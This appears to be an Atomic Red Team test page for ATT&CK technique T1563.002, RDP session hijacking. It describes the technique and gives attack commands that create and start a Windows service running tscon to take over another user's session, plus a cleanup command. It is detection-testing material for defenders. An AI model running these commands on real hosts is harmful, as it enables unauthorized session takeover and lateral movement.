security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
atomic-red-team/atomics/T1563.002/T1563.002.md
T
Atomic Red Team doc generator 9f6a1eab36 Generated docs from job=generate-docs branch=master [ci skip]
2026-02-18 16:55:45 +00:00

2.5 KiB
Raw Permalink Blame History

T1563.002 - Remote Service Session Hijacking: RDP Hijacking

Description from ATT&CK

Adversaries may hijack a legitimate users remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)

Adversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, c:\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to Remote System Discovery and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)

Source

Atomic Tests

Atomic Test #1: RDP hijacking

RDP hijacking - how to hijack RDS and RemoteApp sessions transparently to move through an organization

Supported Platforms: Windows

auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46

Inputs

Name Description Type Default Value
Session_ID The ID of the session to which you want to connect string 1337
Destination_ID Connect the session of another user to a different session string rdp-tcp#55

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}"
net start sesshijack

Cleanup Commands

sc.exe delete sesshijack >nul 2>&1
Reference in New Issue View Git Blame Copy Permalink